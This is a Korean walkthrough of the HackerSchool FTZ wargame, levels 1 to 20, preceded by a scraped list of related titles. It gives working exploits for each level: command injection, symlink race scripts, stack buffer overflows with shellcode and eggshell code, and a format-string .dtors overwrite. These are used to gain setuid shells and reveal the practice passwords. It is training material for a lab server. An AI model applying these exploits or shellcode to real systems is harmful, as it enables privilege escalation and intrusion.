Level 1. Trivial level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -u

Similar documents
Contents 1. 목적 풀이 Level

윤석언 - Buffer Overflow - 윤석언 제12회세미나 수원대학교보안동아리 FLAG

0x <main+41>: lea eax,[ebp-264] 0x f <main+47>: push eax 0x080484a0 <main+48>: call 0x804835c <strcpy> 0x080484a5 <main+53>: add esp,0x1

Microsoft Word - readme.doc

PowerPoint 프레젠테이션

Deok9_Exploit Technique

강의10

PowerPoint Template

Reusing Dynamic Linker For Exploitation Author : Date : 2012 / 05 / 13 Contact : Facebook : fb.me/kwonpwn

2015 CodeGate 풀이보고서 김성우 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다

/chroot/lib/ /chroot/etc/

History

hlogin2

"Analysis of the Exploitation Processes"

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

chap7.key

hlogin7

½½¶óÀ̵å Á¦¸ñ ¾øÀ½

Microsoft PowerPoint - ch04_코드 보안 [호환 모드]

PowerPoint 프레젠테이션

Level 4 ( hell_fire -> evil_wizard ) ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard

Microsoft PowerPoint - ch04_코드 보안 [호환 모드]


0x00 Contents 0x About Nickster 0x Analaysis 0x Exploit

歯7장.PDF

chap7.PDF

歯9장.PDF

Microsoft Word - building the win32 shellcode 01.doc

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -

À©µµ³×Æ®¿÷ÇÁ·Î±×·¡¹Ö4Àå_ÃÖÁ¾

[8051] 강의자료.PDF

02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C

$ret = ""; $socket = fsockopen(" ", 8888, $errno, $errstr, 100); fgets( $socket, 50); fgets( $socket, 50); $ret.= fgets( $socket, 50); $

<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770>

vi 사용법

10.

6주차.key

제1장 Unix란 무엇인가?

버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습

Microsoft PowerPoint - chap13-입출력라이브러리.pptx

untitled

PowerPoint 프레젠테이션

13주-14주proc.PDF

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >

PowerPoint 프레젠테이션

Microsoft Word - Reverse Engineering Code with IDA Pro-2-1.doc

슬라이드 1

Microsoft Word - FreeBSD Shellcode 만들기.docx

Microsoft PowerPoint - polling.pptx

< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074>

0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x = (12 + 6) / 2 * 3; x = 27 x = 3 * (8 / 4

K&R2 Reference Manual 번역본

Fedora Core 3,4,5 stack overflow.docx

MODBUS SERVO DRIVER( FDA7000 Series ) STANDARD PROTOCOL (Ver 1.00) 1

Sena Technologies, Inc. HelloDevice Super 1.1.0

PowerPoint 프레젠테이션

IT CookBook, 정보보안개론 ( 개정판 ) [ 강의교안이용안내 ] 본강의교안의저작권은한빛아카데미 에있습니다. 이자료를무단으로전제하거나배포할경우저작권법 136 조에의거하여최고 5 년이하의징역또는 5 천만원이하의벌금에처할수있고이를병과 ( 倂科 ) 할수도있습니다.

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co

Microsoft Word - FS_ZigBee_Manual_V1.3.docx

제 14 장포인터활용 유준범 (JUNBEOM YOO) Ver 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다.

Microsoft PowerPoint - lab14.pptx

untitled

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO

PowerPoint 프레젠테이션

03장.스택.key

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

untitled

5.스택(강의자료).key

2009년 상반기 사업계획

Microsoft PowerPoint - 09-Pipe

C++ Programming

프로그램을 학교 등지에서 조금이라도 배운 사람들을 위한 프로그래밍 노트 입니다. 저 역시 그 사람들 중 하나 입니다. 중고등학교 시절 학교 도서관, 새로 생긴 시립 도서관 등을 다니며 책을 보 고 정리하며 어느정도 독학으르 공부하긴 했지만, 자주 안하다 보면 금방 잊어

RTL

: 1 int arr[9]; int n, i; printf(" : "); scanf("%d", &n); : : for(i=1; i<10; i++) arr[i-1] = n * i; for(i=0; i<9; i++) if(i%2 == 1) print

MPLAB C18 C

The Lord of the BOF -The Fellowship of the BOF 풀이보고서 by phpmyadmin -Contents- 0x00 프롤로그

SRC PLUS 제어기 MANUAL

교육지원 IT시스템 선진화

lecture4(6.범용IO).hwp

PowerPoint 프레젠테이션

BOF Foundation.doc

The Pocket Guide to TCP/IP Sockets: C Version

본 강의에 들어가기 전

int main(void) int a; int b; a=3; b=a+5; printf("a : %d \n", a); printf("b : %d \n", b); a b 3 a a+5 b &a(12ff60) &b(12ff54) 3 a 8 b printf(" a : %x \

1.hwp

untitled

BMP 파일 처리

Microsoft PowerPoint - Lecture_Note_7.ppt [Compatibility Mode]

ActFax 4.31 Local Privilege Escalation Exploit

UDCSC Hacking Festival 2005

1장. 유닉스 시스템 프로그래밍 개요

Computer Security Chapter 08. Format String 김동진 1 Secure Software Lab.

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

Microsoft PowerPoint - IOControl [호환 모드]

Transcription:

HackerSchool WarGame 풀이 Written by StolenByte http://stolenbyte.egloos.com - 1 -

Level 1. Trivial [level1@ftz level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. [level1@ftz level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -user level2 소유자가 level2인파일을 -2>dev/null 접근할수없는파일에접근하려고해도에러를띄우지않게하는옵션 [level1@ftz level1]$ find / -user level2 2>/dev/null /bin/excuteme 레벨 2 의권한으로당신이원하는명령어를 한가지실행시켜드리겠습니다. ( 단, my-pass 와 chmod 는제외 ) 어떤명령을실행시키겠습니까? [level2@ftz level2]$ /bin/bash [level2@ftz level2]$ my-pass Level2 Password is "hacker or cracker". - 2 -

Level 2. Trivial [level2@ftz level2]$ cat hint 텍스트파일편집중쉘의명령을실행시킬수있다는데... [level2@ftz level2]$ find / -user level3 2>/dev/null /usr/bin/editor [level2@ftz level2]$ /usr/bin/editor... ~ ~ ~ ~ :!/bin/bash [level3@ftz level2]$ id uid=3003(level3) gid=3002(level2) groups=3002(level2) [level3@ftz level2]$ my-pass Level3 Password is "can you fly?". - 3 -

Level 3. Trivial [level3@ftz level3]$ cat hint 다음코드는 autodig 의소스이다. #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char **argv) char cmd[100]; if( argc!=2 ) printf( "Auto Digger Version 0.9\n" ); printf( "Usage : %s host\n", argv[0] ); exit(0); strcpy( cmd, "dig @" ); strcat( cmd, argv[1] ); strcat( cmd, " version.bind chaos txt"); system( cmd ); 이를이용하여 level4 의권한을얻어라 more hints. - 동시에여러명령어를사용하려면? - 문자열형태로명령어를전달하려면? -------------------------------------------------------------------- - 동시에여러명령어를사용하려면? ; - 문자열형태로명령어를전달하려면? - 4 -

[level3@ftz level3]$ find / -user level4 2>/dev/null /bin/autodig strcat( cmd, argv[1] ); 취약점 [level3@ftz level3]$ /bin/autodig ";bash;bash" dig: Couldn't find server '': Name or service not known [level4@ftz level3]$ id uid=3004(level4) gid=3003(level3) groups=3003(level3) [level4@ftz level3]$ my-pass Level4 Password is "suck my brain". - 5 -

Level 4. Trivial [level4@ftz level4]$ cat hint 누군가 /etc/xient.d/ 에백도어를심어놓았다.! [level4@ftz tmp]$ ls /etc/xinetd.d backdoor cups-lpd echo ntalk rsh services telnet chargen daytime echo-udp rexec rsync sgi_fam time chargen-udp daytime-udp finger rlogin servers talk time-udp [level4@ftz tmp]$ cat /etc/xinetd.d/backdoor service finger disable = no flags = REUSE socket_type = stream wait = no user = level5 server = /home/level4/tmp/backdoor log_on_failure += USERID [level4@ftz level4]$ cat tmp/backdoor #!/bin/bash my-pass [level4@ftz level4]$ finger @localhost Level5 Password is "what is your name?". 설명 : backdoor는 /home/level4/tmp/backdoor로데몬형태의 finger로실행권한은 level5로하기때문에 /home/level4/tmp/backdoor를잘만들면 level5의패스워드를획득할수있다. 간단한다들그럿듯쉘스크립트로짜여있었다. ( 이미해당폴더에는해당파일이존재..) 그래서 finger 서비스를실행시켰다. 로컬에서확인하면될것같아서, @localhost 로실행시켰다. ( 현재는포트가닫혀있다네요.) - 6 -

Level 5. Race Condition [level5@ftz level5]$ cat hint /usr/bin/level5 프로그램은 /tmp 디렉토리에 level5.tmp 라는이름의임시파일을생성한다. 이를이용하여 level6 의권한을얻어라 출제자의의도는 Race Condition 이였으나, 안타깝게도프로그램의취약점이있다. [level5@ftz tmp]$ cd /tmp [level5@ftz tmp]$ cat > level5.tmp [level5@ftz tmp]$ /usr/bin/level5 [level5@ftz tmp]$ cat level5.tmp next password : what the hell :: Race Condition 으로풀기 :: [level5@ftz tmp]$ cat main.c #include <stdio.h> int main() while(1) system("/usr/bin/level5"); return 0; [level5@ftz tmp]$ cat exploit.c #include <stdio.h> int main() int i; for(i=0;i<1000;i++) system("ln -s /home/level5/tmp/pass /tmp/level5.tmp"); system("rm level5.tmp"); - 7 -

return 0; [level5@ftz tmp]$ cat pass next password : what the hell - 8 -

Level 6. Trivial login as: level6 level6@ftz.hackerschool.org's password: hint - 인포샵 bbs 의텔넷접속메뉴에서많이사용되던해킹방법이다. <ctrl>+z [level6@ftz level6]$ ls hint password public_html tmp tn [level6@ftz level6]$ cat password Level7 password is "come together". - 9 -

Level 7. Trivial [level7@ftz level7]$ cat hint /bin/level7 명령을실행하면, 패스워드입력을요청한다. 1. 패스워드는가까운곳에.. 2. 상상력을총동원하라. 3. 2진수를 10진수를바꿀수있는가? 4. 계산기설정을공학용으로바꾸어라. [level7@ftz level7]$ find / -user level8 2>/dev/null /bin/level7 [level7@ftz level7]$ /bin/level7 Insert The Password : a 올바르지않은패스워드입니다. 패스워드는가까운곳에... --_--_- -- - ---_- -- -_- --_--_- -- - ---_- -- -_- 1101101 6D m 1100001 61 a 1110100 74 t 1100101 65 e [level7@ftz level7]$ /bin/level7 Insert The Password : mate Congratulation! next password is "break the world". - 10 -

Level 8. Trivial [level8@ftz level8]$ cat hint level9 의 shadow 파일이서버어딘가에숨어있다. 그파일에대해알려진것은용량이 1481 이라는것뿐이다. [level8@ftz level8]$ find / -group level8 2>/dev/null... /etc/rc.d/found.txt /home/level8 /home/level8/tmp /home/level8/public_html /home/level8/public_html/index.html /home/level8/hint [level8@ftz level8]$ cat /etc/rc.d/found.txt level9:$1$vky6sslg$6ryuxtnmevgsfy7xf0wps.:11040:0:99999:7:-1:-1:134549524 C:\run>john-386 shadow Loaded 1 password hash (FreeBSD MD5 [32/32]) apple (level9) guesses: 1 time: 0:00:00:00 100% (2) c/s: 5253 trying: apple - 11 -

Level 9. Buffer Overflow [level9@ftz level9]$ cat hint 다음은 /usr/bin/bof 의소스이다. #include <stdio.h> #include <stdlib.h> #include <unistd.h> main() char buf2[10]; char buf[10]; printf("it can be overflow : "); fgets(buf,40,stdin); if ( strncmp(buf2, "go", 2) == 0 ) printf("good Skill!\n"); setreuid( 3010, 3010 ); system("/bin/bash"); 이를이용하여 level10 의권한을얻어라. [level9@ftz level9]$ /usr/bin/bof It can be overflow : 0123456789012345go Good Skill! [level10@ftz level9]$ id uid=3010(level10) gid=3009(level9) groups=3009(level9) [level10@ftz level9]$ my-pass Level10 Password is "interesting to hack!". - 12 -

Level 10. Programming [level10@ftz level10]$ cat hint 두명의사용자가대화방을이용하여비밀스런대화를나누고있다. 그대화방은공유메모리를이용하여만들어졌으며, key_t의값은 7530, 대화를나눌때사용하는변수명은 text라고한다. 이를이용해두사람의대화를도청하여 hall의권한을얻어라 설명 : 간단한공유메모리프로그래밍할줄알면쉽게풀수있는문제 [level10@ftz tmp]$ cat exploit.c #include<stdio.h> #include<sys/types.h> #include<sys/shm.h> int main() void *address; address = shmat(shmget(7530, 0, IPC_CREAT), 0, 0); printf("%s", address); return 0; [level10@ftz tmp]$ gcc -o exploit exploit.c [level10@ftz tmp]$./exploit 멍멍 : level11의패스워드는? 구타 : what!@#$? - 13 -

Level 11. Buffer Overflow [level11@ftz level11]$ cat hint #include <stdio.h> #include <stdlib.h> int main( int argc, char *argv[] ) char str[256]; setreuid( 3092, 3092 ); strcpy( str, argv[1] ); printf( str ); [level11@ftz tmp]$./egg Using address: 0xbffffab8 [level11@ftz tmp]$./env 0xbffff2ca [level11@ftz level11]$./attackme $RET sh-2.05b$ id uid=3092(level12) gid=3091(level11) groups=3091(level11) sh-2.05b$ my-pass TERM environment variable not set. Level12 Password is "it is like this". - 14 -

Level 12. Buffer Overflow [level12@ftz level12]$ cat hint #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main( void ) char str[256]; setreuid( 3093, 3093 ); printf( " 문장을입력하세요.\n" ); gets( str ); printf( "%s\n", str ); [level12@ftz level12]$ (python -c 'print "A"*256, "\xaa\xf1\xff\xbf"';cat)./attackme 문장을입력하세요. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ªñÿ... [level12@ftz level12]$ (python -c 'print "A"*267, "\xaa\xf1\xff\xbf"';cat)./attackme 문장을입력하세요. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA ªñÿ id uid=3093(level13) gid=3092(level12) groups=3092(level12) my-pass TERM environment variable not set. Level13 Password is "have no clue". - 15 -

Level 13. Buffer Overflow [level13@ftz level13]$ cat hint #include <stdlib.h> main(int argc, char *argv[]) long i=0x1234567; char buf[1024]; setreuid( 3094, 3094 ); if(argc > 1) strcpy(buf,argv[1]); if(i!= 0x1234567) printf(" Warnning: Buffer Overflow!!! \n"); kill(0,11); 설명 : if 조건이참조하는 buf 의주소만 0x1234567 로바꿔주고 ret 의주소는 egg shell 의주 소로바꾸면된다. #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" "\x00\xc9\xc3\x90/bin/sh"; unsigned long get_esp(void) asm ("movl %esp,%eax"); - 16 -

void main(int argc, char *argv[]) char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=default_offset, bsize=default_buffer_size; int i, eggsize=default_egg_size; char temp[4]; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) printf("can't allocate memory.\n"); exit(0); if (!(egg = malloc(eggsize))) printf("can't allocate memory.\n"); exit(0); addr = get_esp() - offset; printf("using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) if(1040 < I) *(addr_ptr++) = addr; else *(addr_ptr++) = 0x1234567; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"egg=",4); - 17 -

putenv(egg); memcpy(buff,"ret=",4); putenv(buff); sprintf(temp, "%p", getenv("ret")); system("/bin/bash"); [level13@ftz tmp]$./egg 1100 Using address: 0xbffffa98 [level13@ftz tmp]$ /home/level13/attackme $RET sh-2.05b$ id uid=3094(level14) gid=3093(level13) groups=3093(level13) sh-2.05b$ my-pass Level13 Password is "what that nigga want?". - 18 -

Level 14. Buffer Overflow [level14@ftz level14]$ cat hint 레벨14 이후로는 mainsource의문제를그대로가져왔습니다. 버퍼오버플로우, 프맷스트링을학습하는데는이문제들이최고의효과를가져다줍니다. #include <stdio.h> #include <unistd.h> main() int crap; int check; char buf[20]; fgets(buf,45,stdin); if (check==0xdeadbeef) setreuid(3095,3095); system("/bin/sh"); id[level14@ftz level14]$ (python -c 'print "\xef\xbe\xad\xde"*50';cat)./attackme uid=3095(level15) gid=3094(level14) groups=3094(level14) my-pass Level15 Password is "guess what". - 19 -

Level 15. Buffer Overflow [level15@ftz level15]$ cat hint #include <stdio.h> main() int crap; int *check; char buf[20]; fgets(buf,45,stdin); if (*check==0xdeadbeef) setreuid(3096,3096); system("/bin/sh"); [level15@ftz level15]$ gdb -q./attackme (gdb) b main Breakpoint 1 at 0x8048496 (gdb) r Starting program: /home/level15/attackme Breakpoint 1, 0x08048496 in main () (gdb) ni... (gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb 0x080484aa in main () (gdb) info reg eax 0xbffff110-1073745648... (gdb) x/11x $eax 0xbffff110: 0x61616161 0x61616161 0x61616161 0x61616161 0xbffff120: 0x61616161 0x61616161 0x61616161 0x61616161 0xbffff130: 0x61616161 0x61616161 0x62626262 0x080484aa in main () (gdb) ni 0x080484ad in main () (gdb) - 20 -

0x080484b0 in main () (gdb) info reg eax 0x62626262 1650614882 (python -c 'print "\xef\xbe\xad\xde"*10 + "\x10\xf1\xff\xbf"';cat)./attackme id uid=3096(level16) gid=3095(level15) groups=3095(level15) my-pass Level16 Password is "about to cause mass". - 21 -

Level 16. Buffer Overflow [level16@ftz level16]$ cat hint #include <stdio.h> void shell() setreuid(3097,3097); system("/bin/sh"); void printit() printf("hello there!\n"); main() int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); call(); [level16@ftz level16]$ gdb -q./attackme (gdb) b main Breakpoint 1 at 0x804851e (gdb) r Starting program: /home/level16/attackme Breakpoint 1, 0x0804851e in main () (gdb) ni... (gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb... (gdb) ni 0x0804853c in main () (gdb) disass main Dump of assembler code for function main: 0x08048518 <main+0>: push %ebp 0x08048519 <main+1>: mov %esp,%ebp 0x0804851b <main+3>: sub $0x38,%esp - 22 -

0x0804851e <main+6>: movl $0x8048500,0xfffffff0(%ebp) 0x08048525 <main+13>: sub $0x4,%esp 0x08048528 <main+16>: pushl 0x80496e8 0x0804852e <main+22>: push $0x30 0x08048530 <main+24>: lea 0xffffffc8(%ebp),%eax 0x08048533 <main+27>: push %eax 0x08048534 <main+28>: call 0x8048384 <fgets> 0x08048539 <main+33>: add $0x10,%esp 0x0804853c <main+36>: mov 0xfffffff0(%ebp),%eax 0x0804853f <main+39>: call *%eax 0x08048541 <main+41>: leave 0x08048542 <main+42>: ret... (gdb) ni 0x0804853f in main () (gdb) info reg eax 0x62626262 1650614882... (gdb) disass shell Dump of assembler code for function shell: 0x080484d0 <shell+0>: push %ebp 0x080484d1 <shell+1>: mov %esp,%ebp 0x080484d3 <shell+3>: sub $0x8,%esp 0x080484d6 <shell+6>: sub $0x8,%esp 0x080484d9 <shell+9>: push $0xc19 0x080484de <shell+14>: push $0xc19 0x080484e3 <shell+19>: call 0x80483b4 <setreuid> 0x080484e8 <shell+24>: add $0x10,%esp 0x080484eb <shell+27>: sub $0xc,%esp 0x080484ee <shell+30>: push $0x80485b8 0x080484f3 <shell+35>: call 0x8048364 <system> 0x080484f8 <shell+40>: add $0x10,%esp 0x080484fb <shell+43>: leave 0x080484fc <shell+44>: ret 0x080484fd <shell+45>: lea 0x0(%esi),%esi [level16@ftz level16]$ (python -c 'print "A"*40 + "\xd0\x84\x04\x08"';cat)./attackme id uid=3097(level17) gid=3096(level16) groups=3096(level16) my-pass Level17 Password is "king poetic". - 23 -

Level 17. Buffer Overflow [level17@ftz level17]$ cat hint #include <stdio.h> void printit() printf("hello there!\n"); main() int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); setreuid(3098,3098); call(); [level17@ftz level17]$ gdb -q./attackme (gdb) b main Breakpoint 1 at 0x80484ae (gdb) r Starting program: /home/level17/attackme Breakpoint 1, 0x080484ae in main ()... 0x080484c3 in main () (gdb) disass main Dump of assembler code for function main: 0x080484a8 <main+0>: push %ebp 0x080484a9 <main+1>: mov %esp,%ebp 0x080484ab <main+3>: sub $0x38,%esp 0x080484ae <main+6>: movl $0x8048490,0xfffffff0(%ebp) 0x080484b5 <main+13>: sub $0x4,%esp 0x080484b8 <main+16>: pushl 0x804967c 0x080484be <main+22>: push $0x30 0x080484c0 <main+24>: lea 0xffffffc8(%ebp),%eax 0x080484c3 <main+27>: push %eax 0x080484c4 <main+28>: call 0x8048350 <fgets> 0x080484c9 <main+33>: add $0x10,%esp 0x080484cc <main+36>: sub $0x8,%esp - 24 -

0x080484cf <main+39>: push $0xc1a 0x080484d4 <main+44>: push $0xc1a 0x080484d9 <main+49>: call 0x8048380 <setreuid> 0x080484de <main+54>: add $0x10,%esp 0x080484e1 <main+57>: mov 0xfffffff0(%ebp),%eax 0x080484e4 <main+60>: call *%eax... (gdb) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb 0x080484c9 in main ()... 0x080484e4 in main () (gdb) info reg eax 0x62626262 1650614882... [level17@ftz level17]$ (python -c 'print "A"*40 + "\xb8\xfa\xff\xbf"';cat)./attackme id uid=3098(level18) gid=3097(level17) groups=3097(level17) my-pass TERM environment variable not set. Level18 Password is "why did you do it". - 25 -

Level 18. Buffer Overflow [level18@ftz level18]$ cat hint #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> void shellout(void); int main() char string[100]; int check; int x = 0; int count = 0; fd_set fds; printf("enter your command: "); fflush(stdout); while(1) if(count >= 100) printf("what are you trying to do?\n"); if(check == 0xdeadbeef) shellout(); else FD_ZERO(&fds); FD_SET(STDIN_FILENO,&fds); if(select(fd_setsize, &fds, NULL, NULL, NULL) >= 1) if(fd_isset(fileno(stdin),&fds)) read(fileno(stdin),&x,1); switch(x) case '\r': case '\n': printf("\a"); break; case 0x08: count--; - 26 -

printf("\b \b"); break; default: string[count] = x; count++; break; void shellout(void) setreuid(3099,3099); execl("/bin/sh","sh",null); ------------------- char string[100]; ------------------- check = 4byte; ------------------- x = 0; ------------------- count = 0; ------------------- string[-4] == check; [level18@ftz level18]$ (python -c 'print "\x08"*4 + "\xef\xbe\xad\xde"';cat)./attackme Enter your command: id uid=3099(level19) gid=3098(level18) groups=3098(level18) my-pass Level19 Password is "swimming in pink". - 27 -

Level 19. Buffer Overflow [level19@ftz level19]$ cat hint main() char buf[20]; gets(buf); printf("%s\n",buf); 설명 : setreuid(getuid(), getuid()); 를사용하게되면정상적으로권한획득이불가능하다. 그래서강제로 level20 의 id 값 (3100) 을넣어줘야한다. 80483d3: 31 c0 xor %eax,%eax 80483d5: b0 1c mov $0x1c,%al 80483d7: b4 0c mov $0xc,%ah 80483d9: 89 c3 mov %eax,%ebx 80483db: 89 d9 mov %ebx,%ecx 80483dd: 31 c0 xor %eax,%eax 80483df: b0 46 mov $0x46,%al 80483e1: cd 80 int $0x80 setreuid(3100, 3100) [level19@ftz tmp]$ vi egg2.c #include <stdio.h> #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x1c\xb4\x0c\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80" // setreuid(3100, 3100); "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; [level19@ftz level19]$ cd /tmp - 28 -

[level19@ftz tmp]$./egg2 400 Using address: 0xbffffab8 [level19@ftz tmp]$ (python -c 'print "\xb8\xfa\xff\xbf"*12';cat) /home/level19/attackme úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ úÿ id uid=3100(level20) gid=3099(level19) groups=3099(level19) my-pass TERM environment variable not set. Level20 Password is "we are just regular guys". - 29 -

Level 20. Format String Bug [level20@ftz level20]$ cat hint #include <stdio.h> main(int argc,char **argv) char bleh[80]; setreuid(3101,3101); fgets(bleh,79,stdin); printf(bleh); [level20@ftz level20]$./attackme AAAA%x%x%x%x AAAA4f401524604009850041414141 [level20@ftz level20]$ objdump -h attackme grep.dtors 18.dtors 00000008 08049594 08049594 00000594 2**2 [level20@ftz level20]$ cd /tmp [level20@ftz tmp]$./egg 400 Using address: 0xbffffab8 [level20@ftz tmp]$./env 0xbffff33a [level20@ftz tmp]$ (python -c 'print "AAAA\x98\x95\x04\x08AAAA\x9A\x95\x04\x08%8x%8x%8x%62226c%n%52421c%n"';c at) /home/level20/attackme id uid=3101(clear) gid=3100(level20) groups=3100(level20) my-pass TERM environment variable not set. clear Password is "i will come in a minute". 웹에등록하세요. * 해커스쿨의모든레벨을통과하신것을축하드립니다. 당신의끈질긴열정과능숙한솜씨에찬사를보냅니다. 해커스쿨에서는실력있는분들을모아연구소라는그룹을운영하고있습니다. 이메시지를보시는분들중에연구소에관심있으신분은자유로운양식의가입신청서를 admin@hackerschool.org로보내주시기바랍니다. - 30 -